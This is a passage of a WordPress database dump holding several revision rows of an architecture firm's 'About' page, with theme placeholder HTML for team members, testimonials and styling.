		</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-05-25 10:17:10','2023-05-25 10:17:10','',38,'https://bauhaus.futuremediatrix.com/?p=4749',0,'revision','',0),(4750,2,'2023-05-25 10:17:10','2023-05-25 10:17:10','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n							<h3>LOREM IPSUM</h3>\n														<h2>\n								LOREM IPSUM\n							</h2>\n		<p>Redesign Life</p><p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>Mike Hardson</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-05-25 10:17:10','2023-05-25 10:17:10','',38,'https://bauhaus.futuremediatrix.com/?p=4750',0,'revision','',0),(4751,2,'2023-05-25 10:17:10','2023-05-25 10:17:10','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n							<h3>LOREM IPSUM</h3>\n														<h2>\n								LOREM IPSUM\n							</h2>\n		<p>Redesign Life</p><p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-05-25 10:17:10','2023-05-25 10:17:10','',38,'https://bauhaus.futuremediatrix.com/?p=4751',0,'revision','',0),(4752,2,'2023-05-25 10:18:06','2023-05-25 10:18:06','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n							<h3>LOREM IPSUM</h3>\n														<h2>\n								LOREM IPSUM\n							</h2>\n		<p>Redesign Life</p><p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image 